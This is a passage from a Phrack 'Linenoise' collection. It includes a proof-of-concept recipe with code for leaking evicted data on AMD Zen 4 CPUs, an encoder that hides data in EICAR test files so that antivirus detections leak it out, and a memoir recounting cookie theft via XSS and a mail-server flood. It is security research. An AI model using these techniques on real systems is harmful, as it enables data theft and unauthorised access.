.:: Phrack Magazine ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ] [ 71 ] [ 72 ]

Get tar.gz

Current issue : #72 | Release date : 2025-08-19 | Editor : Phrack Staff

Introduction	Phrack Staff
Phrack Prophile on Gera	Phrack Staff
Linenoise	Phrack Staff
Loopback	Phrack Staff
The Art of PHP - My CTF Journey and Untold Stories!	Orange Tsai
Guarding the PHP Temple	mr_me
APT Down - The North Korea Files	Saber, cyb0rg
A learning approach on exploiting CVE-2020-9273	dukpt
Mapping IOKit Methods Exposed to User Space on macOS	Karol Mazurek
Popping an alert from a sandboxed WebAssembly module	Thomas Rinsma
Desync the Planet - Rsync RCE	Simon, Pedro, Jasiel
Quantum ROP	Yoav Shifman, Yahav Rahom
Revisiting Similarities of Android Apps	Jakob Bleier, Martina Lindorfer
Money for Nothing, Chips for Free	Peter Honeyman
E0 - Selective Symbolic Instrumentation	Jex Amro
Roadside to Everyone	Jon Gaines
A CPU Backdoor	uty
The Feed Is Ours	tgr
The Hacker's Renaissance - A Manifesto Reborn	TMZ

Title : Linenoise

Author : Phrack Staff

View as text

                           ==Phrack Inc.==

              Volume 0x10, Issue 0x48, Phile #0x03 of 0x12

|=-----------------------------------------------------------------------=|
|=---------------------=[ L I N E N O I S E ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|
|=-----------------------------------------------------------------------=|

    Linenoise is a collection of artifacts that do not fit elsewhere.
    Short papers, corrections, brain dumps, late papers, etc..... :))

Contents

1 - Barbie Sparkles – Barbie

2 - Another use for the EICAR test file – Peter Ferrie

3 - Hacker: Apotheosis of the Marginalized – Kolloid

4 - A Hacker’s Introduction To CHERI – xcellerator

5 - High-Performance Network Scanning With AF_XDP – c3l3si4n

6 - MMIO in the Middle – b1ack0wl

7 - Shell Your Way to Network Mastery – Gabriel & Thomas

8 - Breaking ToaruOS – NOT / Firzen, Binary Gecko



|=-----------------------------------------------------------------------=|
|=-------------------=[     1 - Barbie Sparkles     ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ barbie ]=-------------------------------=|
|=--------------------=[ [email protected] ]=----------------------=|
|=-----------------------------------------------------------------------=|


--[ 0 - Introduction

For a long time, data stored in microarchitectural buffer-like structures' 
behaviors were believed to be strictly internal to the CPU and protected by 
architectural mechanisms built into modern CPUs, many of them lacking 
detailed public documentation. Since 2018 following Microarchitectural Data 
Sampling (MDS) attacks [1] the security community discovered that the 
contents of such buffers might be inferred or even, under the right 
circumstances, directly leaked using e.g., faulting load instruction or in 
the shadow of transiently executed flows. These techniques might allow 
attackers to bypass such architectural mechanisms and other hardware 
mitigations, e.g. buffer clearing or overwriting. 

Lots of such microarchitectural buffers have been documented publicly by 
now, as well as mitigations have been deployed on newer hardware with this 
new threat model in place by most CPU vendors. Unfortunately, we show that 
not all CPU vendors have adopted this new threat vector into their threat 
model, and some newer architectures are being released having such 
dangerous behaviors documented.

In this article, we show that it is possible to observe stale data from 
previously evicted cache entries from an undocumented microarchitectural 
buffer, which we are calling eviction buffer. More specifically, AMD Zen 4 
platforms might enable a malicious process to observe data that is 
previously evicted from a victim process, even if the same victim process 
has been previously terminated.

Moreover, unlike most of prior data inference attacks from 
microarchitectural buffers, this behavior has been documented in the 
official “AMD Zen4 Microarchitecture Documentation” and AMD does not 
consider a security concern.


--[ 1 - Background
--[ 1.1 - Memory Types and Performance Optimizations

Modern CPUs support multiple memory types that are configurable by the OS 
and might be configurable by the VMM. These types enforce the cache policy 
used. There are cacheable memory types like write-back (WB), write-through 
(WT), and write-protect (WP), and uncacheable memory types like uncacheable 
(UC) and write-combining (WC).

The standard page created by the OS for userland applications are WB, which 
allow values to be cached and are written back to the memory when there is 
bandwidth for it and the memory in case is not being actively used and updated.

--[ 1.2 - Write-Combining

Write-Combining (WC) is a memory performance optimization technique, which 
allows for the combination of multiple write operations into a single 
transaction, which can then be written to memory in a more efficient 
manner, reducing the number of bus requests required for the write 
operations. 

For this, the CPU keeps the modified data of all store operations to a 
specific cache line in an internal buffer, until the data can be committed 
to the memory. Then, the data is flushed from the buffer and committed to 
external memory.

We also note, the __Software Optimization Guide for the AMD Zen4 
Microarchitecture (ver. 57647, from January 2023)__ describes in 2.13.3 
Write Combine Buffers the improvements to performance made using their 
aggressively combined write buffers. 

--[ 1.3 - Microarchitectural Buffers

Lots of different microarchitectural structures are used in modern CPUs to 
store data in-transit. Many of such structures have been publicly 
documented and some of them have been even reverse engineered. At the same 
time, there are several prior research exploring the leakage or inference 
of data from internal CPU buffers, include Fallout [2], Zombieload [3], and 
RIDL [4]. Each of such attacks target a different buffer, e.g. store 
buffers, load buffers, and fill buffers. 

Since the security community identified such behaviors, mitigations have 
been deployed on newer hardware having in mind that such buffers should 
also be treated as containing assets in their threat model. 
In this work, we have identified an undocumented microarchitectural buffer, 
which seems to be handling previously evicted cache entries, when such 
entries have been tagged as belonging to uncacheable memory. We are calling 
this undocumented microarchitectural structure the _eviction buffer_. 


--[ 2 - barbieSparkles

At the high-level, barbieSparkles may load data from unintended evicted 
cache entries from the eviction buffer after we change the memory type to 
WC. We were able to see this behavior bypassing context boundaries such as 
cross threads, cross cores, and even VM host to guest.

--[ 2.1 - Eviction Sets

A precondition for barbieSparkles is that the attacker is able to evict 
cache entries from the victim process. There is numerous research in this 
area, ranging from reverse engineering cache sets to a more brute-force 
style. 

--[ 2.2 - Memory Type Change

Normally, only OS and VMM software have permissions to change the memory 
type of a specific page. For our proof-of-concept, we use the PTEditor 
library [5]. PTEditor is a library that enables modification of page-table 
levels, change memory types, and other memory manipulation actions through 
user level APIs provided by a Linux Kernel Module.

--[ 2.3 - First Sparkle

Our first sighting of a sparkle occurred by chance, and it was unexpected. 
We wanted to check if we can modify the memory type from cacheable memory 
and validate a cache poisoning behavior. There are many reasons why a 
modern CPU invalidates and poisons cache lines. And if one is playing with 
memory types, why not just check also uncacheables one? And there it was, 
when changing the memory type of a process from a cacheable one to WC. 
Following the first time spotting it, we began our research by implementing 
various tests which could give us one or more insights on what and why it 
was happening. The first test was not perfect:

// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;


We could see some sparkle, but it wasn't clear where and why:

(...)
result targetsrc val: 0x0, access time: 1440
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 675 // the stale value
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42, access time: 495 // the secret value
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 1485
result targetsrc val: 0x0, access time: 540
(...)


So, we went for more statistical testing. Running the code 100 times in a 
loop of 512 iterations, we would get from 1 to 2 digits hits on the secret. 
This isn't enough though. If we can see data that isn't supposed to be 
there, then we want to see it all the time, right? 

--[ 2.4 - I See Sparkles EVERYWHERE

From there, we started to check different contexts, trying to figure out 
from where the leakage was coming from. We decided to test if we could leak 
cross threads in hyperthreading system.

Check the pairs:

$ cat /sys/devices/system/cpu/cpu*/topology/thread_siblings_list
0,8
2,10
3,11
4,12
5,13
6,14
7,15
1,9


And we test two siblings:

$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 1440
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
(...)
$ ./barbiesparkles -c 10 -s 41414141 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 630
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x8, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
(...)


This shows that whatever buffer we are leaking from, it is shared within 
the core at least. Next step, can we leak cross-core?

$ ./barbiesparkles -c 2 -s 43434343 -n 512 -I 100 &>/dev/null
$ ./barbiesparkles -c 3 -s 44444444 -n 512 -I 100 | grep result
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 585
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 495
(...)


Huh, so our buffer is shared across all cores? Nice! We also observe that 
we still have some hits for the value we store in the targetsrc 
(0x33333333), even if it is a lower hit rate than the secret value. To 
force the architectural value to be committed, we flush the cache before we 
change the memory type:

// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);

// Evict the cache
flush(buf_targetsrc);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;


With that, we now have actual 100% hits on the architectural (0x33) value. This 
seems deterministic enough to me.

$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 540
(...)


But remember that we were reading the data AFTER changing the memory type 
to WC, which assumes that the data shouldn't be present in the cache 
anymore. Just to be sure that we are seeing the current architectural value 
of targetsrc, we overwrite it with 0x11 and re-run the tests:

// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);

// Evict the cache
flush(buf_targetsrc);

// Overwrite buffer with a dummy value
memset(buf_targetsrc, 0x11);

// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;


... and nope. What we are seeing isn't the architectural value - it is the 
evicted stale value:

$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x33333333 | wc -l
100


And again, 100% of the hits. Even if we flush the targetsrc buffer (with 
value 0x33) and overwrite it with the new value (0x11) we still get 100% 
hits on the value 0x33. We have in place stale data! 

To confirm that we are seeing only evicted data, we flush it right after 
overwriting it with 0x11 or after changing the memory type (it doesn't seem 
to matter at all) and re-run the test:

$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x11111111 | wc -l
100


--[ 2.5 - Finding The Sparkles Source

We started the obvious tests, for example, we mapped the secret buffer 
pages to the same physical page and that gave us, zero, nada hits, 
confirming that this wasn’t leaking due to a stale TLB entry. After tons of 
such tests, we realized we don’t actually know the microarchitectural 
structure where the is leak coming from, so we are started calling it the 
“eviction buffer”.
To leak the stale data, there must be a full physical address tag hit on 
the eviction buffer. We wrote a PoC for this behavior by tracking the 
physical memory address throughout the tests and then matching the secret 
addresses with their respective tags.

To get the physical address, we used PTEditor built-in function 
ptedit_pte_get_pfn, which returns the – as you might expect – the 
page-frame number.


--[ 3 - Sparkle PoC Recipe

If you want to see your Zen4 platform sparkling for yourself:

1.  Create two processes – one is the victim, one is the attacker. 

    a.  The victim allocates a memory buffer and writes a secret value to 
    it. 
    Then, the victim overwrites the secret in memory, frees the allocated 
    buffer, and exits (yeap, the process doesn’t need to be running)!

    b.  The attacker allocates memory in order to reclaim the same physical 
    pages previously used by the victim to write the secret. You can choose 
    your own version for this – allocating tons of memory is legit :)

2.  The attacker marks the reclaimed memory as WC and flushes the TLB 
(making sure that the TLB entry is up-to-date).

3.  The attacker reads the memory and gets the secret – all sparkling!
Serving options:

    - Overwrite the secret in the victim and terminate the victim 
    process: 
        The attacker is able to leak the secret even if the secret value 
        was previously overwritten architecturally. 
    - Run the victim and the attacker processes in the same core (sibling 
    threads), in any neighboring core (in the same CPU), or leak between 
    host and guest virtual machine.
    - Try it out mixing and matching domains, e.g., VM host and guest


--[ 4 - Reading the Funny Manual

It is important to note before we let you go that the __AMD64 Architecture 
Programmer's Manual Volume 2: System Programming__ (https://www.amd.com/
system/files/TechDocs/24593.pdf) actually documents that we should not play 
and switch between cache policies of a specific physical page, quoting:

7.8.7 Changing Memory Type
A physical page should not have differing cacheability types assigned to it
through different virtual mappings; they should be either all of a
cacheable type (WB, WT, WP) or all of a non-cacheable type (UC, WC).

Otherwise, this may result in a loss of cache coherency, leading to stale
data and unpredictable behavior.


So, please you all behave, and follow the manual – otherwise, there will be 
sparkles.

--[ 6 - References

[1] Intel Corp. (2021-03-11). "Microarchitectural Data Sampling."
[2] Minkin, Marina; Moghimi, Daniel; Lipp, Moritz; Schwarz, Michael; Van 
Bulck, Jo; Genkin, Daniel; Gruss, Daniel; Piessens, Frank; Sunar, Berk; 
Yarom, Yuval (2019-05-14). "Fallout: Reading Kernel Writes From User Space"
[3] Schwarz, Michael; Lipp, Moritz; Moghimi, Daniel; Van Bulck, Jo; 
Stecklina, Julian; Prescher, Thomas; Gruss, Daniel (2019-05-14). 
"ZombieLoad: Cross-Privilege-Boundary Data Sampling"
[4] van Schaik, Stephan; Milburn, Alyssa; Österlund, Sebastian; Frigo, 
Pietro; Maisuradze, Giorgi; Razavi, Kaveh; Bos, Herbert; Giuffrida, 
Cristiano (2019-05-14). "RIDL: Rogue In-Flight Data Load"
[5] Michael Schwarz. PTEditor. https://github.com/misc0110/PTEditor


|=-----------------------------------------------------------------------=|
|=------------=[ 2 - Another use for the EICAR test file ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ Peter Ferrie (qkumba) ]=-----------------------=|
|=-----------------------------------------------------------------------=|

    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The EICAR test string, right?

    68 bytes
    CRC32 6851cf3c
    MD5 44d88612fea8a8f36de82e1278abb02f
    SHA256 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f

Right? Right??

No.

It's actually

    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

followed by up to 60 bytes of restricted white-space characters. The allowed
white-space characters are

    Space
    Ctrl-Z
    Tab
    CR
    LF

So?

What if...

    Space = 0b, Ctrl-Z = 1b, 60 bits per file, 7.5 bytes

EICAR is now a steganography vehicle

Maybe a bit fancier

    Space   %*1*00000
    Ctrl-Z  %0*1*1010
    Tab     %00*1*000
    CR      %001*1*01
    LF      %0010*1*0

All five characters have one bit in a unique position Four bits in a 
nibble, decoder becomes simpler

60 bits is not enough?

    Space = 0b
    Ctrl-Z = 1b
    Tab = 10b
    CR = 11b

120 bits per file, 15 bytes

But wait!
There's more!

Any subset of the five characters can represent the zero bit The rest can
represent the one bit

EICAR as *OLIGOMORPHIC* steganography vehicle!

"hello world" (*)

    0D200A080D080A1A081A0A1A1A0A080D201A0D0808201A1A201A1A202020200A
    1A20200D201A1A2020080D1A08081A200A0A080D1A0A0D

    SHA256
    6a154634b1be7df212863e486b2b1d0cb842e72c3baef941b1054e50fc08b993

(*) 5-bit text-encoding, one special character; tab/cr/lf=0, space/ctrl-z=1

Or "hello world"

    08200A0D0A0D081A08200A1A1A0A0A0A20200D0D08201A1A201A201A201A2008
    1A1A1A0D2020201A20080820080A1A20080A0A0D20080D

    SHA256
    f982fa69f04053060d82aece78df2dbf10b2fcf86e842ffe44fbc287f4f4b92c

Or "hello world"

    0A200D0A0A0D0D1A0A1A0A1A1A080D0D20200A0D0D1A201A1A1A1A20201A1A0D
    202020081A1A201A1A0D08200D0D1A1A0D080A081A0D08

    SHA256
    09258537fe9ea0105831873c4fbe8d000e54491fdfe446d7d353544c7b4cf334

The encoder

    s=[" ","\x1a"," "]
    c=["\t","\r","\n"]
    t=""
    for(x=0;x<text.length;x++) {
      q=text.charCodeAt(x,1)&31
      if(!q)q=31
      for(b=32;b>>=1;)
        t+=((q&b)?s:c)[Math.floor(Math.random()*3)]
    }
    return t


Multiple EICAR files mean more data File naming can define data ordering

1. Create the files on disk
2. Trigger a scan
3. Detections will include the unique file hash

The *anti-malware engine* will leak the data The files never have to leave 
the disk

Noisy? Yes
But it only has to work once



|=-----------------------------------------------------------------------=|
|=-----------=[ 3 - Hacker: Apotheosis of the Marginalized ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Kolloid ]=------------------------------=|
|=-----------------------------------------------------------------------=|


--> 01: Introduction

Much like Phrack, I will soon be entering into my 40s.  I'm at that stage
where I'm reflecting on the rebelliousness of my youth, wondering what
it all meant.  Some of it brought financial gain, such as the time I found
a legitimate exploit that allowed me to win a Mercedes-Benz C-Class.
Some of it helped me along my career path, like when I used various social
engineering techniques to gain escalated privileges within a Fortune 500
company, enabling me to become a data scientist and submit a patent in
applied machine learning despite having no prior experience in the field.
Some of it led nowhere at all, like when I discovered a glitch in my stock
broker's trading platform that allowed me to borrow over $200K at a
negative interest rate until my account was promptly disabled when the
risk management team realized what I had done.  Although I fondly reminisce
on these events, it's not the outcomes that I find particularly meaningful.
Instead, it's what those acts reveal about myself that gives me the
greatest meaning: they show that I'm a hacker.

For the longest time, I was hesitant to call myself a hacker.  I felt
insecure in that identity because I wasn't using rootkits to gain access
into systems.  I didn't use Linux.  I didn't even have a compiler to make
executables.  Instead, I made simple tools from the resources available
to me (i.e., the default programs installed on Windows XP).  I mainly
worked out of Notepad in my early years, using  JavaScript as my language
of choice.  I would do things like paste the decoded Base64 binaries of
cookies from two different accounts into two different instances of Notepad,
flipping back and forth like an animator flipping between pages to identify
bit changes.  Or I would use frames to pass credentials through the URL,
iterating with a script through an array on a timer to visually inspect five
frames at a time if any combination in my list would grant me access.  Since
I wasn't using a "real" programming language, I felt lesser, even though my
tools and techniques still enabled me to get what I was seeking and were
things made for myself.

Although I did not appreciate it at the time, my janky tools made in Notepad
represented the very essence of what made me a hacker.  In one form of
the definition, a hack is something roughly and hastily done. It is the
antithesis of something refined, so it is on the frontier, retaining some
uncivilized wildness to it.  On the frontier is where we find the hacker,
moving the boundaries of society by pushing the system beyond its intended
bounds, kicking and screaming all the way into new, unknown territory.
In that sense, the hacker is the modern-day embodiment of the mythological
trickster figure whose subversive acts keep society lively through the
amusement and chaos he brings.  I could not fully embrace my identity as
a hacker until I first understood the archetypal role the hacker represented
and the mythology I was living out.


          "The best way to describe trickster is to say simply 
          that the boundary is where he will be found--sometimes 
          drawing the line, sometimes crossing it, sometimes 
          erasing or moving it, but always there, the god of the 
          threshold in all its forms."

          - Lewis Hyde, Trickster Makes This World


--> 02: The Myth of Hermes

          "If my father will not give me honors, then I will steal 
          them."

          - Hermes

In "Trickster Makes This World," Lewis Hyde retells the story of Hermes, who
is the son of Zeus, king of the gods, and a cave nymph by means of an extra-
marital affair. His questionable birth makes it uncertain if he will become
recognized as a god as well. He was born with the stain of illegitimacy but
born undeniably exceptional, pointing to his divine ancestry, even if it
could not be explicitly stated aloud.  He was also born with a certain
impulsiveness, so he decides as a day-old baby to steal fifty head of cattle
from his half-brother Apollo, claiming that he was hungry for something
more substantial than the milk he was given.  In doing so, Hermes displays
his craftiness by walking the stolen cattle backward and by wearing special
sandals he crafted himself to obscure his footprints.  When he got back,
he slaughtered and cooked two of the cattle but did not eat the meat.
Instead, he hid it away and climbed back into his crib.

When Hermes' mother, Maia, discovers what he has done, she questions him by
asking how he could be so shameless to do such a thing.  Hermes first denies
the accusations by saying, "I am just a little baby.  How could I possibly
have stolen these cattle?"  Maia, who sees through her child's attempt at
deception, questions Hermes again, who laments in frustration, "Why must we
live in this cave when the other gods live on Olympus enjoying the fruits of
sacrifices?  If my father will not give me honors, then I will steal them."

Apollo eventually notices that some cattle from his herd are gone and also
somehow already knows that it was the newly-born Hermes that took them.
Apollo tracks down and questions Hermes, who once again responds with,
"I am just a little baby.  How could I possibly have stolen your cattle?"
Apollo threatens to throw baby Hermes into the depths of Tartarus if he does
not give him his cattle back, but Hermes does not relent to Apollo.  Since
neither would concede, Hermes declares that Zeus must judge who is right.
So Apollo drags Hermes up to Olympus to plead his case before their father,
telling Zeus of all the cunning details of Hermes' theft that he discovered.

For a third time, Hermes proclaims, "I am just a baby.  How could I possibly
have stolen those cattle?"  Zeus is amused at the audacity of the theft and
the steadfastness of Hermes' denial, even when caught.  So, Zeus begins to 
laugh.  Surely, this is the son of Zeus.  Rather than punishment, Zeus
orders Hermes to make amends with his brother and show him where the cattle
are hidden, revealing his tricks.  On their way to the hiding spot, Hermes
begins to play the lyre (which he also invented using the shell of a
tortoise he killed while on the way to steal the cattle), and Apollo becomes
enchanted by its sound, never hearing music before.  When they finally reach
the missing cattle, Hermes gives the lyre to Apollo as a gift.  In return,
Apollo gives the cattle to Hermes and a whip to symbolize his now legitimate
ownership of them, and the two become friends from that point forward. 

Hermes is a god of paradoxes, for he is a paradox as well.  How is it that
Hermes could be the illegitimate son of Zeus, the king of the gods?  How
could the most legitimate of all the gods produce anything illegitimate?
Just by existing, Hermes is a challenge to the order of Olympus, causing
trouble on his first day being born.  So he lies by saying, "I am just a
little baby," but it is a lie that forces others to acknowledge the truth
that he is more than just a little baby.  He begins to unwind his own
paradox. He lures others into engaging with it.  If he was just a baby, then
he could not have stolen those cattle.  If he was something more, then they
must admit that he should be elevated, deserving of praise instead of shame.
Somehow, through initially stealing those fifty head of cattle, Hermes
became recognized as being their rightful owner.  Coincidentally, he also
ended up on Olympus in the presence of his now delighted father, a place he
was never meant to be.  An illegitimate act set into motion the process of
being recognized as legitimate.  

Things worked out for Hermes, but one does not always receive honors, even
if the things of gods are successfully stolen.  Sometimes, the gods are not
amused.  Sometimes, you are thrown into Tartarus.


--> 03: Tartarus From My First Major Hack

When I was fifteen, I learned through my biology teacher about a website
that offered weekly prizes of up to $500 in gift certificates for winning
trivia quizzes.  After about two hours of repetition for each quiz, I became
fast enough to win by recognizing the questions and their answers by the
shape of the text and the first few words.  The purpose of the website was
to promote learning, but the quizzes ended up becoming just a reflex test.
I had to answer each question in a second or two, far below the amount of
time to even fully read the question. Regardless, I was able to win through
the intended means.  I could do what I was supposed to do.  However, it
wasn't sustainable because my vision would go blurry after a few hours of
intently staring at my CRT screen flickering at 60 Hz.  There had to be a
better way that didn't end with me going blind.

As I was lying in bed one evening, a thought came to me: Maybe I could
modify the cache file that contained the answers by overwriting the
individual characters within the file without changing the overall size of
the file.  I regularly went through the Temporary Internet Files folder
that held the cache for Internet Explorer, so I already discovered the file
that contained the answers. Still, I was never able to successfully run
modified cache files before.  I wondered if there might be some internal
validation that checked if the file was the same size as when it was
initially downloaded before it ran in Offline Mode to ensure the file had
not been corrupted.  So, I got out of bed to give it a try, and this time
it finally worked!  I now had the ability to change websites (at least
how they interacted with me) in any way I saw fit, giving me something I
was never meant to have.

I would clear my cache, run the quiz once online to download the necessary
files, switch to Offline Mode, modify the cache file so that the answers
would always show up in the same location instead of a randomized one,
retake the quiz, and click on "Yes" when my browser would ask if I wanted to
leave Offline Mode when it tried to submit my scores back to the server.
This technique worked perfectly, except when I would replace a character
with a line return, so I just avoided using them when I modified my files.
I would use the same technique later on to spoof file requests to sites that
blocked ones from outside of the domain (especially useful for downloading
multipart RAR files when paired with a download manager).  I found that I
could reorder things meant to be difficult to be easier for me so that
I no longer needed to sacrifice myself in the process to get them.

There was a leaderboard on the site, so I saw that there was one other
student who figured out the same trick as me because we were far faster
than anyone else.  Curiously, my first major hack was the only time I
spotted another hacker in the wild.  The moment I found myself, I also found
another like me, and it was the two of us competing against each other.
The rest of the world just fell away.  We formed a new game while everyone
else blissfully imagined that they were still participating in something
that no longer existed.

Unfortunately, my downfall began the moment the gift certificates began to
arrive. It was real, and I couldn't contain my excitement.  I imagine that
it was the same feeling as when a child first discovers that he can count to
100, overflowing with pride.  I had this new ability that brought tangible
rewards, and I began to share the news with my family.  However, the
response was not what I expected it to be.  Instead of being met with
amazement and congratulations, I was met with disappointment.  I was told
that what I was doing was wrong and that I should stop immediately.
So, I quit and hid my newly discovered talent in shame.  I suppose that such
an experience is just a rite of passage for the hacker, but I had no one to
acknowledge the virtue of such actions.  I was not recognized, so I became
invisible.  I was thrown into Tartarus.


--> 04: Olympus - Finally Being Seen

In my sophomore year in college, I got a job as a software quality tester
for a startup after hearing about an opening from a friend who also recently
got a job there.  I thought it would be exciting to be a part of the Web 2.0 
boom, but the job ended up being pretty boring.  The entire role was to
follow a premade checklist and ensure that everything was functioning as
documented.
The icon is blue.  Check.
The icon turns green when clicked.  Check. 
I thought my technical skills would be useful, but this role required no
skill at all.  This job was monotonous, and I quickly began suffering from
the lack of stimulus.  Boredom is a very real form of suffering.  I
desperately needed something to happen, some randomness, so I began
looking for something to break under the guise of "quality assurance."
Soon, I found something.  I would make something happen.

As was common at that time, the front page of the site said that it was in
beta and had a contact form to join the list for the test release.
I wondered if the form sent an email or if the submissions were stored in
a database.  What would happen if I sent a flood of requests?  Something
would happen, and I would gain some new knowledge of what was going on in
the backend.  The anticipation of discovery through a bit of mischief was
the breath of fresh air I needed.  Maybe I would get fired, but this role
was already dead to me, so it was worth the risk.  On the Friday before I
left work, I placed a stapler on my enter key to continually resubmit the
form over the weekend and turned off my monitor.

When I got back on Monday, my boss learned what I had done and pulled me
aside.  He told me that I had overloaded the email server to the point
where it started smoking (I'm not sure if that was literal or not).  So, I
now knew that the form did send out emails, which did indeed mean it was
more vulnerable to attacks like the one I just pulled off with a common
office stapler. Strangely, I didn't get fired or even reprimanded.  Instead,
my boss started to tell me about how he used to frequent the old BBSs when
he was younger.  He was once a hacker from a bygone era and was trying to
tell me that he saw me for who I truly was: a hacker like him.  I was seen,
but it was not with the usual malice I encountered in school when I was
younger. I was seen for the qualities that my boss cherished about his
younger self and maybe even for ones that he felt were lost somewhere
along the way.

That recognition was transformative in many ways.  Instead of punishment for
my actions, my boss gave me a raise and a new title of "software security
tester."  My role within the system was made anew into something that
conformed to who I was instead of being made to conform to something
I wasn't.  I was allowed to be myself because I was finally seen for who I
was, and it was seen as good instead of bad.  Most importantly, I was
granted the official freedom to create and run my own tests, as opposed to
the liberty that I took for myself.  Like Hermes, the thing that I stole
somehow became legitimately recognized as mine.  

A job that was inherently lacking creativity was transformed into one of the
most creative periods of my life.  It was at this job where I used a Base64
encoder/decoder I created in JavaScript to get into other accounts by
changing the binary in two locations of the cookie.  After the developers
updated to use sessions, I worked my way up to creating a special email that
sent me the session information when users opened it.  The web app didn't
strip out embedded scripts, so I was able to hijack its functionality to
access the cookie and send it to me in an email.  My time there became a
game of cat and mouse with the architects, transcending the original purpose
of simply testing the software. Still, the unintended byproduct of that game
was better software.

Things could have gone drastically different for me, and they did for my
friend who introduced me to the company.  Frustrated with the tedium of the
job, my friend also destroyed some equipment by ripping out keys from his
keyboard one day.  I was promoted when I destroyed a server, but my friend
ended up getting fired when he destroyed his keyboard.  Two seemingly
similar actions stemming from the same place of discontentment but yielding
two completely different outcomes.  It's like the story of Cain and Abel,
where both brothers offer up a sacrifice.  One is looked upon favorably by
God, while the other is not, and it's not entirely clear why.  If anything,
I should have been punished more severely for my more severe transgression,
